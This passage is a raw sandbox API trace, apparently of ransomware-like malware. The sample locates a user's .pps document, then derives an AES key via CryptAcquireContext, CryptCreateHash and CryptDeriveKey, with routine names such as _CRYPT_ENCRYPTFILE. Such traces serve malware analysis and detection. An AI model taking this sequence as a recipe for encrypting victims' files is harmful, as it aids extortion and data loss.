NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NPo61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Po61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="61DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DTLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TLm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Lm5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m5sBx.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.718] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0170.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0170.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0170.718] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0170.718] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0170.718] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0170.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0170.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0170.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0170.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0170.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0170.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0170.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pps", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0170.719] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0170.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0170.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0170.719] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0170.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0170.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0170.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0170.719] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0170.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0170.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0170.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0170.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0170.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0170.719] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0170.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0170.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0170.720] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0170.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0170.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0170.720] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb60d02d0, ftCreationTime.dwHighDateTime=0x1d5e110, ftLastAccessTime.dwLowDateTime=0xa4489aa0, ftLastAccessTime.dwHighDateTime=0x1d5e417, ftLastWriteTime.dwLowDateTime=0xa4489aa0, ftLastWriteTime.dwHighDateTime=0x1d5e417, nFileSizeHigh=0x0, nFileSizeLow=0x137a4, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="Im NPo61DTLm5sBx.pps", cAlternateFileName="IMNPO6~1.PPS")) returned 0x90af58 [0170.720] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0170.720] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0170.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0170.720] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0170.720] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0170.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0170.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0170.720] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0170.721] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0170.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0170.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0170.721] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0170.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0170.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0170.721] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0170.721] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0170.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0170.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0170.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0170.721] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0170.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0170.721] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0170.722] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0170.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0170.722] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0170.722] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0170.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0170.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0170.722] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0170.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0170.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0170.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0170.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0170.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0170.722] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0170.722] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0170.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0170.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0170.722] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0170.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0170.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0170.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0170.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0170.723] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0170.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0170.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0170.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0170.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0170.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0170.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0170.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0170.725] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0170.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0170.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0170.726] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0170.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0170.726] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0170.726] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0170.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0170.726] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0170.726] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.726] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.726] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0170.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0170.726] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0170.726] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0170.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0170.726] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0170.726] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0170.727] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0170.727] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0170.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0170.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0170.727] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0170.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0170.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0170.727] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0170.727] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0170.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0170.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0170.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0170.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0170.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0170.727] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0170.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0170.727] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0170.727] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0170.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0170.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0170.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0170.728] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0170.728] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0170.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0170.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0170.728] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0170.728] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0170.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0170.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0170.728] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0170.728] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0170.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0170.728] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0170.728] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0170.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0170.728] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0170.728] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0170.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0170.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0170.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0170.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0170.729] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0170.729] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0170.729] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0170.729] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0170.729] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0170.729] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0170.729] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.729] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.729] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.729] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.729] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0170.729] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.730] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.730] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0170.730] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0170.730] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0170.730] CryptHashData (hHash=0x90ae18, pbData=0x8dedf8, dwDataLen=0x19, dwFlags=0x1) returned 1 [0170.730] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.730] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.730] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.730] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0170.730] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0170.730] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0170.730] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0170.730] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0170.730] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0170.730] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.730] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.731] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 